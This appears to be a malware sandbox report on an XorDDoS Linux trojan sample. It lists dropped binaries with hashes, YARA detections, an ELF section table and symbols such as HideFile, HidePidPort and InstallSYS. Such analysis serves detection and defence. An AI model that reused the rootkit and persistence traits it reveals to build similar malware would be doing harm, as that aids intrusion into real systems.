                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/sotpizdssr, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/sotpizdssr, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/sotpizdssr, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244382117358649
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AX:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91C
                                                                  MD5:CBA8307E43BFF3556880DCD526A511A5
                                                                  SHA1:9655FAC05DB014E498D807E4ADDFDA43756098C3
                                                                  SHA-256:91B91DC5E316ED6240B86DA3AC43C62BDDC64776701F127648E68DDFF816C1E9
                                                                  SHA-512:764A34406357FA840B90543C3CB8173861752179098C100ED389B79F817BE86736661C6942A8D9AE9642DDA5D5C066C0E777D410D83DE36F665224B2F5F1D78B
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/sxruomujjd, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/sxruomujjd, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/sxruomujjd, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/sxruomujjd, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625878
                                                                  Entropy (8bit):6.244382673094052
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Ah:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/910
                                                                  MD5:8C8E618EFD671F62350F8FF8336CB8BC
                                                                  SHA1:97057940B690DDF8EC246528BB9E6F76A33B45DB
                                                                  SHA-256:E8CFF2EC6E81CE465B0AAF32D1BA5EB2DC83257C49710AF37471789AB450AC87
                                                                  SHA-512:456CD713C3AF89B4660D3DDE98B36F82849541D6F5EBBEBA8C6CF47311C8CBB479C9B27CAD2DB506F5E16EC25B24246726AD7CF769DCF622D14C98C65A45B840
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wvbxepjyjx, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wvbxepjyjx, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wvbxepjyjx, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wvbxepjyjx, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  Process:/tmp/HaJTqGiPpD
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Category:dropped
                                                                  Size (bytes):625867
                                                                  Entropy (8bit):6.244347907365657
                                                                  Encrypted:false
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91h
                                                                  MD5:A14578469FAB44514DFCA6C4EEAD755D
                                                                  SHA1:CF09EC13381B559A9D0E2CED5D8D710C8BA2AFFA
                                                                  SHA-256:3BB61C0AD19495AE554363823EB83657B403C3AACDF9CDDB9B111C2C4321A6DA
                                                                  SHA-512:D512738B7732DE3EEC37E9EB024D4FC592F13190BBE069B1884F9B6348357E4EAFCB1CA01ED75E4D8BB9CAC7164CBD006A18E5467D24A17B540124652FA1EB27
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security
                                                                  • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                  • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                  • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/lib/libudev.so, Author: Akamai CSIRT
                                                                  • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 72%
                                                                  Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                  File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                  Entropy (8bit):6.244347907365657
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                  File name:HaJTqGiPpD
                                                                  File size:625'867 bytes
                                                                  MD5:a14578469fab44514dfca6c4eead755d
                                                                  SHA1:cf09ec13381b559a9d0e2ced5d8d710c8ba2affa
                                                                  SHA256:3bb61c0ad19495ae554363823eb83657b403c3aacdf9cddb9b111c2c4321a6da
                                                                  SHA512:d512738b7732de3eec37e9eb024d4fc592f13190bbe069b1884f9b6348357e4eafcb1ca01ed75e4d8bb9cac7164cbd006a18e5467d24a17b540124652fa1eb27
                                                                  SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91h
                                                                  TLSH:A3D47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
                                                                  File Content Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, little endian
                                                                  Version:1 (current)
                                                                  Machine:Intel 80386
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x8048110
                                                                  Flags:0x0
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:5
                                                                  Section Header Offset:553480
                                                                  Section Header Size:40
                                                                  Number of Section Headers:28
                                                                  Header String Table Index:25
                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                  .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                                  .textPROGBITS0x80481100x1100x697d80x00x6AX0016
                                                                  __libc_freeres_fnPROGBITS0x80b18f00x698f00x100f0x00x6AX0016
                                                                  __libc_thread_freeres_fnPROGBITS0x80b29000x6a9000x1db0x00x6AX0016
                                                                  .finiPROGBITS0x80b2adc0x6aadc0x1c0x00x6AX004
                                                                  .rodataPROGBITS0x80b2b000x6ab000x153c00x00x2A0032
                                                                  __libc_subfreeresPROGBITS0x80c7ec00x7fec00x300x00x2A004
                                                                  __libc_atexitPROGBITS0x80c7ef00x7fef00x40x00x2A004
                                                                  __libc_thread_subfreeresPROGBITS0x80c7ef40x7fef40x80x00x2A004
                                                                  .eh_framePROGBITS0x80c7efc0x7fefc0x60f40x00x2A004
                                                                  .gcc_except_tablePROGBITS0x80cdff00x85ff00x11b0x00x2A001
                                                                  .tdataPROGBITS0x80cf10c0x8610c0x140x00x403WAT004
                                                                  .tbssNOBITS0x80cf1200x861200x2c0x00x403WAT004
                                                                  .ctorsPROGBITS0x80cf1200x861200x80x00x3WA004
                                                                  .dtorsPROGBITS0x80cf1280x861280xc0x00x3WA004
                                                                  .jcrPROGBITS0x80cf1340x861340x40x00x3WA004
                                                                  .data.rel.roPROGBITS0x80cf1380x861380x2c0x00x3WA004
                                                                  .gotPROGBITS0x80cf1640x861640x80x40x3WA004
                                                                  .got.pltPROGBITS0x80cf16c0x8616c0xc0x40x3WA004
                                                                  .dataPROGBITS0x80cf1800x861800xb400x00x3WA0032
                                                                  .bssNOBITS0x80cfcc00x86cc00x67180x00x3WA0032
                                                                  __libc_freeres_ptrsNOBITS0x80d63d80x86cc00x140x00x3WA004
                                                                  .commentPROGBITS0x00x86cc00x4220x00x0001
                                                                  .shstrtabSTRTAB0x00x870e20x1260x00x0001
                                                                  .symtabSYMTAB0x00x876680x93c00x100x0279144
                                                                  .strtabSTRTAB0x00x90a280x82a30x00x0001
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  LOAD0x00x80480000x80480000x8610b0x8610b6.19650x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                                  LOAD0x8610c0x80cf10c0x80cf10c0xbb40x72e03.65720x6RW 0x1000.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                  NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                                  TLS0x8610c0x80cf10c0x80cf10c0x140x402.84140x4R 0x4.tdata .tbss
                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                  .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                  .symtab0x80480d40SECTION<unknown>DEFAULT1
                                                                  .symtab0x80480f40SECTION<unknown>DEFAULT2
                                                                  .symtab0x80481100SECTION<unknown>DEFAULT3
                                                                  .symtab0x80b18f00SECTION<unknown>DEFAULT4
                                                                  .symtab0x80b29000SECTION<unknown>DEFAULT5
                                                                  .symtab0x80b2adc0SECTION<unknown>DEFAULT6
                                                                  .symtab0x80b2b000SECTION<unknown>DEFAULT7
                                                                  .symtab0x80c7ec00SECTION<unknown>DEFAULT8
                                                                  .symtab0x80c7ef00SECTION<unknown>DEFAULT9
                                                                  .symtab0x80c7ef40SECTION<unknown>DEFAULT10
                                                                  .symtab0x80c7efc0SECTION<unknown>DEFAULT11
                                                                  .symtab0x80cdff00SECTION<unknown>DEFAULT12
                                                                  .symtab0x80cf10c0SECTION<unknown>DEFAULT13
                                                                  .symtab0x80cf1200SECTION<unknown>DEFAULT14
                                                                  .symtab0x80cf1200SECTION<unknown>DEFAULT15
                                                                  .symtab0x80cf1280SECTION<unknown>DEFAULT16
                                                                  .symtab0x80cf1340SECTION<unknown>DEFAULT17
                                                                  .symtab0x80cf1380SECTION<unknown>DEFAULT18
                                                                  .symtab0x80cf1640SECTION<unknown>DEFAULT19
                                                                  .symtab0x80cf16c0SECTION<unknown>DEFAULT20
                                                                  .symtab0x80cf1800SECTION<unknown>DEFAULT21
                                                                  .symtab0x80cfcc00SECTION<unknown>DEFAULT22
                                                                  .symtab0x80d63d80SECTION<unknown>DEFAULT23
                                                                  .symtab0x00SECTION<unknown>DEFAULT24
                                                                  .L108.symtab0x80ad9500NOTYPE<unknown>DEFAULT3
                                                                  .L113.symtab0x80ad9900NOTYPE<unknown>DEFAULT3
                                                                  .L114.symtab0x80ad9f80NOTYPE<unknown>DEFAULT3
                                                                  .L115.symtab0x80ada300NOTYPE<unknown>DEFAULT3
                                                                  .L116.symtab0x80ada4e0NOTYPE<unknown>DEFAULT3
                                                                  .L117.symtab0x80ada6c0NOTYPE<unknown>DEFAULT3
                                                                  .L118.symtab0x80ada890NOTYPE<unknown>DEFAULT3
                                                                  .L119.symtab0x80adabd0NOTYPE<unknown>DEFAULT3
                                                                  .L12.symtab0x80b130b0NOTYPE<unknown>DEFAULT3
                                                                  .L120.symtab0x80adadc0NOTYPE<unknown>DEFAULT3
                                                                  .L121.symtab0x80adafb0NOTYPE<unknown>DEFAULT3
                                                                  .L122.symtab0x80ad8e30NOTYPE<unknown>DEFAULT3
                                                                  .L123.symtab0x80adb2b0NOTYPE<unknown>DEFAULT3
                                                                  .L124.symtab0x80add7f0NOTYPE<unknown>DEFAULT3
                                                                  .L125.symtab0x80addb40NOTYPE<unknown>DEFAULT3
                                                                  .L126.symtab0x80add020NOTYPE<unknown>DEFAULT3
                                                                  .L127.symtab0x80add1f0NOTYPE<unknown>DEFAULT3
                                                                  .L128.symtab0x80add460NOTYPE<unknown>DEFAULT3
                                                                  .L129.symtab0x80add630NOTYPE<unknown>DEFAULT3
                                                                  .L130.symtab0x80adb8c0NOTYPE<unknown>DEFAULT3
                                                                  .L131.symtab0x80adbd30NOTYPE<unknown>DEFAULT3
                                                                  .L132.symtab0x80adc000NOTYPE<unknown>DEFAULT3
                                                                  .L133.symtab0x80adc370NOTYPE<unknown>DEFAULT3
                                                                  .L134.symtab0x80adc500NOTYPE<unknown>DEFAULT3
                                                                  .L135.symtab0x80adc7d0NOTYPE<unknown>DEFAULT3
                                                                  .L136.symtab0x80adcb50NOTYPE<unknown>DEFAULT3
                                                                  .L137.symtab0x80adcc90NOTYPE<unknown>DEFAULT3
                                                                  .L14.symtab0x80b14190NOTYPE<unknown>DEFAULT3
                                                                  .L15.symtab0x80b14080NOTYPE<unknown>DEFAULT3
                                                                  .L16.symtab0x80b13f80NOTYPE<unknown>DEFAULT3
                                                                  .L17.symtab0x80b13e80NOTYPE<unknown>DEFAULT3
                                                                  .L18.symtab0x80b138c0NOTYPE<unknown>DEFAULT3
                                                                  .L19.symtab0x80b137e0NOTYPE<unknown>DEFAULT3
                                                                  .L20.symtab0x80b13450NOTYPE<unknown>DEFAULT3
                                                                  .L21.symtab0x80b13710NOTYPE<unknown>DEFAULT3
                                                                  .L258.symtab0x80ae76c0NOTYPE<unknown>DEFAULT3
                                                                  .L259.symtab0x80ae4a00NOTYPE<unknown>DEFAULT3
                                                                  .L260.symtab0x80ae5f70NOTYPE<unknown>DEFAULT3
                                                                  .L261.symtab0x80ae7c00NOTYPE<unknown>DEFAULT3
                                                                  .L262.symtab0x80ae5e90NOTYPE<unknown>DEFAULT3
                                                                  .L264.symtab0x80ae43d0NOTYPE<unknown>DEFAULT3
                                                                  .L266.symtab0x80ae4960NOTYPE<unknown>DEFAULT3
                                                                  .L267.symtab0x80ae68f0NOTYPE<unknown>DEFAULT3
                                                                  .L268.symtab0x80ae6a00NOTYPE<unknown>DEFAULT3
                                                                  .L269.symtab0x80ae6050NOTYPE<unknown>DEFAULT3
                                                                  .L270.symtab0x80ae6280NOTYPE<unknown>DEFAULT3
                                                                  .L271.symtab0x80ae6420NOTYPE<unknown>DEFAULT3
                                                                  .L272.symtab0x80ae6640NOTYPE<unknown>DEFAULT3
                                                                  .L273.symtab0x80ae4ab0NOTYPE<unknown>DEFAULT3
                                                                  .L274.symtab0x80ae4e40NOTYPE<unknown>DEFAULT3
                                                                  .L275.symtab0x80ae5990NOTYPE<unknown>DEFAULT3
                                                                  .L276.symtab0x80ae55f0NOTYPE<unknown>DEFAULT3
                                                                  .L277.symtab0x80ae5da0NOTYPE<unknown>DEFAULT3
                                                                  .L278.symtab0x80ae8350NOTYPE<unknown>DEFAULT3
                                                                  .L279.symtab0x80ae7ce0NOTYPE<unknown>DEFAULT3
                                                                  .L280.symtab0x80ae7e00NOTYPE<unknown>DEFAULT3
                                                                  .L281.symtab0x80ae6b70NOTYPE<unknown>DEFAULT3
                                                                  .L282.symtab0x80ae70c0NOTYPE<unknown>DEFAULT3
                                                                  .L283.symtab0x80ae4670NOTYPE<unknown>DEFAULT3
                                                                  .L350.symtab0x80ae8400NOTYPE<unknown>DEFAULT3
                                                                  .L351.symtab0x80ae84a0NOTYPE<unknown>DEFAULT3
                                                                  .L352.symtab0x80ae8590NOTYPE<unknown>DEFAULT3
                                                                  .L353.symtab0x80ae8630NOTYPE<unknown>DEFAULT3
                                                                  .L354.symtab0x80ae8720NOTYPE<unknown>DEFAULT3
                                                                  .L355.symtab0x80ae87d0NOTYPE<unknown>DEFAULT3
                                                                  .L356.symtab0x80ae8870NOTYPE<unknown>DEFAULT3
                                                                  .L357.symtab0x80ae8920NOTYPE<unknown>DEFAULT3
                                                                  .L358.symtab0x80ae89e0NOTYPE<unknown>DEFAULT3
                                                                  .L359.symtab0x80ae8aa0NOTYPE<unknown>DEFAULT3
                                                                  .L360.symtab0x80ae8b30NOTYPE<unknown>DEFAULT3
                                                                  .L361.symtab0x80ae8bd0NOTYPE<unknown>DEFAULT3
                                                                  .L362.symtab0x80ae8cc0NOTYPE<unknown>DEFAULT3
                                                                  .L363.symtab0x80ae8db0NOTYPE<unknown>DEFAULT3
                                                                  .L364.symtab0x80ae8ea0NOTYPE<unknown>DEFAULT3
                                                                  .L365.symtab0x80ae8f90NOTYPE<unknown>DEFAULT3
                                                                  .L366.symtab0x80ae9080NOTYPE<unknown>DEFAULT3
                                                                  .L380.symtab0x80ae4380NOTYPE<unknown>DEFAULT3
                                                                  .L411.symtab0x80aeb100NOTYPE<unknown>DEFAULT3
                                                                  .L412.symtab0x80aeae60NOTYPE<unknown>DEFAULT3
                                                                  .L413.symtab0x80aeb540NOTYPE<unknown>DEFAULT3
                                                                  .L414.symtab0x80aebc00NOTYPE<unknown>DEFAULT3
                                                                  .L415.symtab0x80aec200NOTYPE<unknown>DEFAULT3
                                                                  .L416.symtab0x80aec600NOTYPE<unknown>DEFAULT3
                                                                  .L61.symtab0x80ad6730NOTYPE<unknown>DEFAULT3
                                                                  .L63.symtab0x80ad6ef0NOTYPE<unknown>DEFAULT3
                                                                  .L64.symtab0x80ad6ce0NOTYPE<unknown>DEFAULT3
                                                                  .L67.symtab0x80ad6de0NOTYPE<unknown>DEFAULT3
                                                                  .L68.symtab0x80ad6d60NOTYPE<unknown>DEFAULT3
                                                                  .L69.symtab0x80ad6a20NOTYPE<unknown>DEFAULT3
                                                                  .L70.symtab0x80ad6c20NOTYPE<unknown>DEFAULT3
                                                                  .L74.symtab0x80afb630NOTYPE<unknown>DEFAULT3
                                                                  .L76.symtab0x80afbdf0NOTYPE<unknown>DEFAULT3
                                                                  .L77.symtab0x80afbbe0NOTYPE<unknown>DEFAULT3
                                                                  .L80.symtab0x80afbce0NOTYPE<unknown>DEFAULT3
                                                                  .L81.symtab0x80afbc60NOTYPE<unknown>DEFAULT3
                                                                  .L82.symtab0x80afb920NOTYPE<unknown>DEFAULT3
                                                                  .L83.symtab0x80afbb20NOTYPE<unknown>DEFAULT3
                                                                  AddService.symtab0x8048865807FUNC<unknown>DEFAULT3
                                                                  CalcCrc32.symtab0x80492b470FUNC<unknown>DEFAULT3
                                                                  CalcFileCrc.symtab0x8049346172FUNC<unknown>DEFAULT3
                                                                  CalcFindIpCrc.symtab0x804932038FUNC<unknown>DEFAULT3
                                                                  CalcHeaderCrc.symtab0x80492fa38FUNC<unknown>DEFAULT3
                                                                  CheckLKM.symtab0x804a670107FUNC<unknown>DEFAULT3
                                                                  CreateDir.symtab0x80483de375FUNC<unknown>DEFAULT3
                                                                  DNS_ADDR.symtab0x80cf4cc16OBJECT<unknown>DEFAULT21
                                                                  DNS_ADDR2.symtab0x80cf4dc16OBJECT<unknown>DEFAULT21
                                                                  DNS_PORT.symtab0x80cf4ec4OBJECT<unknown>DEFAULT21
                                                                  DelService.symtab0x8048cdc275FUNC<unknown>DEFAULT3
                                                                  DelService_form_pid.symtab0x8048def113FUNC<unknown>DEFAULT3
                                                                  GetCpuInfo.symtab0x804e2ce539FUNC<unknown>DEFAULT3
                                                                  GetIndex.symtab0x804b418189FUNC<unknown>DEFAULT3
                                                                  GetLanSpeed.symtab0x804e5e1243FUNC<unknown>DEFAULT3
                                                                  GetMemStat.symtab0x804e1d9245FUNC<unknown>DEFAULT3
                                                                  Get_AllIP.symtab0x804ef5d375FUNC<unknown>DEFAULT3
                                                                  HideFile.symtab0x804a74d151FUNC<unknown>DEFAULT3
                                                                  HidePidPort.symtab0x804a6db114FUNC<unknown>DEFAULT3
                                                                  InstallSYS.symtab0x8048b8c336FUNC<unknown>DEFAULT3
                                                                  LinuxExec.symtab0x8048eed122FUNC<unknown>DEFAULT3
                                                                  LinuxExec_Argv.symtab0x8048f67135FUNC<unknown>DEFAULT3
                                                                  LinuxExec_Argv2.symtab0x8048fee148FUNC<unknown>DEFAULT3
                                                                  LogFacility.symtab0x80cfa0c4OBJECT<unknown>DEFAULT21
                                                                  LogFile.symtab0x80cfa084OBJECT<unknown>DEFAULT21
                                                                  LogMask.symtab0x80cfa004OBJECT<unknown>DEFAULT21
                                                                  LogStat.symtab0x80d50444OBJECT<unknown>DEFAULT22
                                                                  LogTag.symtab0x80d50484OBJECT<unknown>DEFAULT22
                                                                  LogType.symtab0x80cfa044OBJECT<unknown>DEFAULT21
                                                                  MAGIC_STR.symtab0x80d1f6033OBJECT<unknown>DEFAULT22
                                                                  MainList.symtab0x80d1fa0264OBJECT<unknown>DEFAULT22
                                                                  ReadWord.symtab0x804e150137FUNC<unknown>DEFAULT3
                                                                  SIZE_DNS_H.symtab0x80cf4a44OBJECT<unknown>DEFAULT21
                                                                  SIZE_DNS_T.symtab0x80cf4a84OBJECT<unknown>DEFAULT21
                                                                  SIZE_IP_H.symtab0x80cf4984OBJECT<unknown>DEFAULT21
                                                                  SIZE_PSEUDO_HDR.symtab0x80cf4ac4OBJECT<unknown>DEFAULT21
                                                                  SIZE_TCP_H.symtab0x80cf4a04OBJECT<unknown>DEFAULT21
                                                                  SIZE_UDP_H.symtab0x80cf49c4OBJECT<unknown>DEFAULT21
                                                                  SYS_BUF.symtab0x80cfce01OBJECT<unknown>DEFAULT22
                                                                  SyslogAddr.symtab0x80d5060110OBJECT<unknown>DEFAULT22
                                                                  THREAD_NUM.symtab0x80d61704OBJECT<unknown>DEFAULT22
                                                                  _Exit.symtab0x8067a2819FUNC<unknown>DEFAULT3
                                                                  _GLOBAL_OFFSET_TABLE_.symtab0x80cf16c0OBJECT<unknown>HIDDEN20
                                                                  _IO_2_1_stderr_.symtab0x80cf700152OBJECT<unknown>DEFAULT21
                                                                  _IO_2_1_stdin_.symtab0x80cf5c0152OBJECT<unknown>DEFAULT21
                                                                  _IO_2_1_stdout_.symtab0x80cf660152OBJECT<unknown>DEFAULT21
                                                                  _IO_adjust_column.symtab0x805c9b060FUNC<unknown>DEFAULT3
                                                                  _IO_adjust_wcolumn.symtab0x808477063FUNC<unknown>DEFAULT3
                                                                  _IO_cleanup.symtab0x805d310409FUNC<unknown>DEFAULT3
                                                                  _IO_default_doallocate.symtab0x805de10143FUNC<unknown>DEFAULT3
                                                                  _IO_default_finish.symtab0x805e310525FUNC<unknown>DEFAULT3
                                                                  _IO_default_imbue.symtab0x805cac05FUNC<unknown>DEFAULT3
                                                                  _IO_default_pbackfail.symtab0x805d900310FUNC<unknown>DEFAULT3
                                                                  _IO_default_read.symtab0x805ca9010FUNC<unknown>DEFAULT3
                                                                  _IO_default_seek.symtab0x805ca7015FUNC<unknown>DEFAULT3
                                                                  _IO_default_seekoff.symtab0x805c90015FUNC<unknown>DEFAULT3
                                                                  _IO_default_seekpos.symtab0x805c81059FUNC<unknown>DEFAULT3
                                                                  _IO_default_setbuf.symtab0x805dd10244FUNC<unknown>DEFAULT3
                                                                  _IO_default_showmanyc.symtab0x805cab010FUNC<unknown>DEFAULT3
                                                                  _IO_default_stat.symtab0x805ca8010FUNC<unknown>DEFAULT3
